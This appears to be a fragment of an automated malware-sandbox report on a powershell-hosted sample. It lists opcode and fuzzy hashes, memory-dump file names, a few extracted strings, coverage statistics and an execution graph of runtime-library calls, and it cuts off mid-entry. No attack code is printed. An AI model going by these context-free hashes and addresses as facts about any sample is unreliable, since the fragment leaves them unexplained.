                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9d6290e9229a7a716cb28e69589959c7e2ce5f48ea762a3b5574c2288c349a98
                                                                                                                                                                                                                                                • Instruction ID: cea300b40fd25ab349aa985fbd48d6d0ceb8a2009673656ed955f0ec52fe0aa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d6290e9229a7a716cb28e69589959c7e2ce5f48ea762a3b5574c2288c349a98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D21A130719E489FC794EB2CC89496577E2FF5E31531605BDD08AC7A66CA68FC42CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7bdb48e3a5d429a4d2a7999f9ff02c8cd7197cd0191a09b84722178807810809
                                                                                                                                                                                                                                                • Instruction ID: ad27f28692e472f22371b5960757e17b25edd3722590c3cccda45da470758485
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bdb48e3a5d429a4d2a7999f9ff02c8cd7197cd0191a09b84722178807810809
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6217B32A0E68A4FF7648A1CAC652B937E0FF4B321F050176EA0DD3097EE6C68159781
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9d8d694edfb40a55284956176afaf42c4f6418f84a626120df2f9f028def48b1
                                                                                                                                                                                                                                                • Instruction ID: 607a365f5a0502579fa228223f8848b0f7e5cebae8269d124086391172bff0aa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d8d694edfb40a55284956176afaf42c4f6418f84a626120df2f9f028def48b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7116D3120A8488FEB95EB2CD898A657FE1EF6A31230605F6E089CB276DA15DC80C740
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cdbc3e2654c2d977c77b561e6bddbe5339ba292ea4d2d3a53da86e192558bbd9
                                                                                                                                                                                                                                                • Instruction ID: 89dba56c304e79e9d0b0de9351124550af518f5cf8c7f2d68e192e24924b88cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cdbc3e2654c2d977c77b561e6bddbe5339ba292ea4d2d3a53da86e192558bbd9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9821D22170EBC90FE7529BB858B22717FE1AF47210B0A00FBC089CB197DD5CD8069752
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 66f9f61925879b7436934779d8590ada48ee77fb438e3228def633c4a3f98453
                                                                                                                                                                                                                                                • Instruction ID: 4a07e2b1dac9cd1457480744c9c105c7d17e2dccac21fec5c9efe82f94d8afc0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66f9f61925879b7436934779d8590ada48ee77fb438e3228def633c4a3f98453
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39114C30B1DE050FEB94BA2C44A927673C1DB9B351F11053FD50ED32AADDADE8414381
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d93982a4bfeb05ae9b5ff9aea4aba1d4a793de1ab8434849e8c770edb4ac7d04
                                                                                                                                                                                                                                                • Instruction ID: 03b79dbaf3478ce3d269638d87b349f7a0a89b8b7252afd7bacd7e27bde05281
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d93982a4bfeb05ae9b5ff9aea4aba1d4a793de1ab8434849e8c770edb4ac7d04
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3821663060DA498FDB96EB28C494F617BE1FF5A300F1540E9D14DCB2A7CA69EC81CB40
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4885151489.00007FFD34590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd34590000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 426cd55cbfe778bce8073592e9853c1b419e9cab1fa6767584739cbe9c263cc4
                                                                                                                                                                                                                                                • Instruction ID: 89c7f9feba1a4abb73c9e5287a005fc8097580360c4c30d66fc19dc0631f539e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 426cd55cbfe778bce8073592e9853c1b419e9cab1fa6767584739cbe9c263cc4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A110A33F0E5854FDBB6DB1888B067477F1EF4721270800BAD15DD7192DA1CAC009341
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5a09b93db1400ecd975f87b69db31f481e3754cbbcc1e22bd5559dff237932a0
                                                                                                                                                                                                                                                • Instruction ID: 49ae01527f57aabc8680fcda9de63ed71860af9d63f503ba66f8229c92886b49
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a09b93db1400ecd975f87b69db31f481e3754cbbcc1e22bd5559dff237932a0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1511A13260D3914FE75B8B28A8A24947FA0DF53230B0A01FBD1C6CB0A7E55A5C87C751
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction ID: 61100adba5c5e2356a92ac8ee12c3ef5fce638fd76c9d87f019b7429443f443e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA01677121CB0C4FD744EF0CE491AA5B7E0FB95364F50056EE58AC3665D736E881CB45
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5d74714ca41288fccc7c3615d3ba4f164b051ab4cdcc1130620bfb8d91aab9e5
                                                                                                                                                                                                                                                • Instruction ID: 7b24fae6fae56d68561c56294b2d73db9f4f08818bdd66acdb828a93b2150166
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d74714ca41288fccc7c3615d3ba4f164b051ab4cdcc1130620bfb8d91aab9e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1F04C73E0E90C87EF005568AC904D8BB90EFC7358F05007BE51CD31A2DAAD9841C342
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 324dbe5f48885d2885e456113494e082f9ca3a314722232f265d970a32c0beb4
                                                                                                                                                                                                                                                • Instruction ID: 21ff359eb7ab82f6e3d242400e9e1f98359c87468bd57d068258d5ac45148d1b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 324dbe5f48885d2885e456113494e082f9ca3a314722232f265d970a32c0beb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F0272271EB0E0FD7A0D9ED6CD623133C8EB5B21074A007AE608C3257EDC8DC015781
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4894422358.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd34840000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2e41b28d12889d8959293bd56953f8e583f551d0eebb1031504ed6efce4a0fb9
                                                                                                                                                                                                                                                • Instruction ID: ae54309630b140e683a78491ee8f8c87d7e30e934e9479fc12471d3b167430d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e41b28d12889d8959293bd56953f8e583f551d0eebb1031504ed6efce4a0fb9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5F0303171CF044FE748EE2DE4496A6B7E1FBA8355F10462FE44EC3651DB25E8818786
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 052b0f7c5f45551b7b21524b328aa4aa07b80ad8471cb9c678d99c7b2d92212b
                                                                                                                                                                                                                                                • Instruction ID: 934b5d9badd539420c5f5256636c43781190bf905d88b0222ba1a130f4aa6d08
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 052b0f7c5f45551b7b21524b328aa4aa07b80ad8471cb9c678d99c7b2d92212b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2E08C30810A0C8F8B44EF18D8099EA77E0FB68305B01426BF80ED3120DB30AA58CBC2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4
                                                                                                                                                                                                                                                • API String ID: 0-4088798008
                                                                                                                                                                                                                                                • Opcode ID: e8d309eede3fa4e6690e834c1b8b31b25ed9b752d37a35ee1087f28e38bc4a9c
                                                                                                                                                                                                                                                • Instruction ID: 541b0344879987a043eb993a1d7f5b981e21bde9c3ab064c9a3df7e359ef5805
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8d309eede3fa4e6690e834c1b8b31b25ed9b752d37a35ee1087f28e38bc4a9c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA12A183F0D6D32BF752967C6AB61E53FA0DF53265B0E00B3D689C6097EC4D2C06A295
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: N_^
                                                                                                                                                                                                                                                • API String ID: 0-3769343188
                                                                                                                                                                                                                                                • Opcode ID: 8dd16ef1c75479a5352ac15464371038a590f75c89422f267e5925b787f4fd43
                                                                                                                                                                                                                                                • Instruction ID: 1437b7e5a89da2de34c3ea6b91eb8285e437895564ef9e67dd603621ff937dd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dd16ef1c75479a5352ac15464371038a590f75c89422f267e5925b787f4fd43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22A16207B4C57625E22132FE78663FE9B99CF922FAB4C4277D38CD90879C08249652E5
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: M_^
                                                                                                                                                                                                                                                • API String ID: 0-3807191693
                                                                                                                                                                                                                                                • Opcode ID: 4b5bf60725d87142b3a586dc5dc091d5e1c296f098a32284360f95c656f2d5a8
                                                                                                                                                                                                                                                • Instruction ID: 6e045c24accc78600839a2a96684beabcbb834a9ad8fd825557e2a073b7ff11d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4b5bf60725d87142b3a586dc5dc091d5e1c296f098a32284360f95c656f2d5a8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8818916B4E2925FD312777C68F61EA7FA09F5322570A01F7C1C8CE0B7ED4C145A9691
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c8d15d144e60248ab891ac1fd603bbdbaa922be7d756804668e6c00b2ff6f941
                                                                                                                                                                                                                                                • Instruction ID: d76c32181e6e26fa527410e26e48b6ba5d86139388bc7d78837e6f29ae291d55
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8d15d144e60248ab891ac1fd603bbdbaa922be7d756804668e6c00b2ff6f941
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F11A97B0E6932FE762A66C5CF61E67BE0EF5322470E00B7C288C6097ED5D6C069351
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 254881283a50a71a1eba3d3a6750ee35a91d9b7652c9a5b59fac4f3805600aaa
                                                                                                                                                                                                                                                • Instruction ID: 72f983791fc8ee61f443ea565df04ec8a43514537733a81eacd457344628c835
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 254881283a50a71a1eba3d3a6750ee35a91d9b7652c9a5b59fac4f3805600aaa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16D1C853F4EAD22EE762566C19FA2E53BD0EF13214B0E01F7C698D6097EC4D6C069352
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3d4d2f8f6512c3f76a8956b6e0a10c8b6d8fc0e6a62ef92891faf0f8966c8947
                                                                                                                                                                                                                                                • Instruction ID: 5a15ac8db89e27bcde09104b37a60f21f2f97671338352f5ca1879496ffb676d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d4d2f8f6512c3f76a8956b6e0a10c8b6d8fc0e6a62ef92891faf0f8966c8947
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6C1B127A0E7D29FE3129B3C58F50E67FA1EF1326470A01BBC6C4CE0E7E64969069751
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1be3627b343042246ece57d677e8e8d2dad8b32b14ef680423cf196398b5f93a
                                                                                                                                                                                                                                                • Instruction ID: d9455fa9ea8366e9f75376f7f312242f50dcb71964ebea98464ad371c6432320
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1be3627b343042246ece57d677e8e8d2dad8b32b14ef680423cf196398b5f93a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C91D367A4E7D69EE712563D68B60E77BE0EF13225B0E01F7C684CA093ED0D18479351
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f8b8f22c866eba9bc210792c5843d35eceb3625e46209203bcc345304f0d466
                                                                                                                                                                                                                                                • Instruction ID: 0dcdad0cc0d507ae3ad4478331994381e670fc2fd92016e313a83d8e06ba9c05
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f8b8f22c866eba9bc210792c5843d35eceb3625e46209203bcc345304f0d466
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C351A367A0F3D51FE3935A6C68B50EA7F60DF4326AB0A02F7C5C4CA0A3D95D5806C391
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 114cff4392c08f939bcdb9ddb37d80f2cf90739f73c630fd25c87a5901d44eab
                                                                                                                                                                                                                                                • Instruction ID: 4461196ff3c77ae512635ea1405d637ea813f263a8464d1175fdcc32cfee331c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 114cff4392c08f939bcdb9ddb37d80f2cf90739f73c630fd25c87a5901d44eab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD41A357A4EBD65EE712562E18B60DB7FD0EF1326470E01FBCA84CB083AD4D1887A252
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4883358628.00007FFD344C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ffd344c0000_powershell.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 744474fd37097e0ded0bd0f022ec2b95f27cf79f1c8f8dbe89e438b58c130403
                                                                                                                                                                                                                                                • Instruction ID: 5eab253dfb2a634edafd7fec9c90e1b2574f84bb2a3ddea8e17cd73bea094ffa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 744474fd37097e0ded0bd0f022ec2b95f27cf79f1c8f8dbe89e438b58c130403
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58115B52A4E2D25FE313977898B62E63FB0AF4322470A41F7D1C88E0E3D90C645A9352

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:8.7%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:1.1%
                                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                                Total number of Limit Nodes:38
                                                                                                                                                                                                                                                execution_graph 18892 7ff7e530bae0 18893 7ff7e530bb0e 18892->18893 18894 7ff7e530baf5 18892->18894 18894->18893 18896 7ff7e531d5fc 12 API calls 18894->18896 18895 7ff7e530bb6e 18896->18895 20464 7ff7e532abe3 20465 7ff7e532abf3 20464->20465 20468 7ff7e5315478 LeaveCriticalSection 20465->20468 20291 7ff7e532ad69 20294 7ff7e5315478 LeaveCriticalSection 20291->20294 20470 7ff7e532adfe 20471 7ff7e532ae17 20470->20471 20472 7ff7e532ae0d 20470->20472 20474 7ff7e5320338 LeaveCriticalSection 20472->20474 16361 7ff7e531f98c 16362 7ff7e531fb7e 16361->16362 16364 7ff7e531f9ce _isindst 16361->16364 16363 7ff7e5314f08 _set_fmode 11 API calls 16362->16363 16381 7ff7e531fb6e 16363->16381 16364->16362 16367 7ff7e531fa4e _isindst 16364->16367 16365 7ff7e530c550 _log10_special 8 API calls 16366 7ff7e531fb99 16365->16366 16382 7ff7e5326194 16367->16382 16372 7ff7e531fbaa 16374 7ff7e531a900 _isindst 17 API calls 16372->16374 16376 7ff7e531fbbe 16374->16376 16379 7ff7e531faab 16379->16381 16407 7ff7e53261d8 16379->16407 16381->16365 16383 7ff7e531fa6c 16382->16383 16384 7ff7e53261a3 16382->16384 16389 7ff7e5325598 16383->16389 16414 7ff7e53202d8 EnterCriticalSection 16384->16414 16390 7ff7e53255a1 16389->16390 16391 7ff7e531fa81 16389->16391 16392 7ff7e5314f08 _set_fmode 11 API calls 16390->16392 16391->16372 16395 7ff7e53255c8 16391->16395 16393 7ff7e53255a6 16392->16393 16394 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16393->16394 16394->16391 16396 7ff7e531fa92 16395->16396 16397 7ff7e53255d1 16395->16397 16396->16372 16401 7ff7e53255f8 16396->16401 16398 7ff7e5314f08 _set_fmode 11 API calls 16397->16398 16399 7ff7e53255d6 16398->16399 16400 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16399->16400 16400->16396 16402 7ff7e531faa3 16401->16402 16403 7ff7e5325601 16401->16403 16402->16372 16402->16379 16404 7ff7e5314f08 _set_fmode 11 API calls 16403->16404 16405 7ff7e5325606 16404->16405 16406 7ff7e531a8e0 _invalid_parameter_noinfo 37 API calls 16405->16406 16406->16402 16415 7ff7e53202d8 EnterCriticalSection 16407->16415 20490 7ff7e5315410 20491 7ff7e531541b 20490->20491 20499 7ff7e531f2a4 20491->20499 20512 7ff7e53202d8 EnterCriticalSection 20499->20512 19322 7ff7e5327c20 19325 7ff7e53225f0 19322->19325 19326 7ff7e53225fd 19325->19326 19330 7ff7e5322642 19325->19330 19331 7ff7e531b224 19326->19331 19332 7ff7e531b250 FlsSetValue 19331->19332 19333 7ff7e531b235 FlsGetValue 19331->19333 19335 7ff7e531b242 19332->19335 19336 7ff7e531b25d 19332->19336 19334 7ff7e531b24a 19333->19334 19333->19335 19334->19332 19337 7ff7e531b248 19335->19337 19338 7ff7e531a504 __GetCurrentState 45 API calls 19335->19338 19339 7ff7e531eb98 _set_fmode 11 API calls 19336->19339 19351 7ff7e53222c4 19337->19351 19340 7ff7e531b2c5 19338->19340 19341 7ff7e531b26c 19339->19341 19342 7ff7e531b28a FlsSetValue 19341->19342 19343 7ff7e531b27a FlsSetValue 19341->19343 19344 7ff7e531b2a8 19342->19344 19345 7ff7e531b296 FlsSetValue 19342->19345 19346 7ff7e531b283 19343->19346 19347 7ff7e531aef4 _set_fmode 11 API calls 19344->19347 19345->19346 19348 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19346->19348 19349 7ff7e531b2b0 19347->19349 19348->19335 19350 7ff7e531a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19349->19350 19350->19337 19374 7ff7e5322534 19351->19374 19353 7ff7e53222f9 19389 7ff7e5321fc4 19353->19389 19356 7ff7e531d5fc _fread_nolock 12 API calls 19357 7ff7e5322327 19356->19357 19358 7ff7e532232f 19357->19358 19360 7ff7e532233e 19357->19360 19359 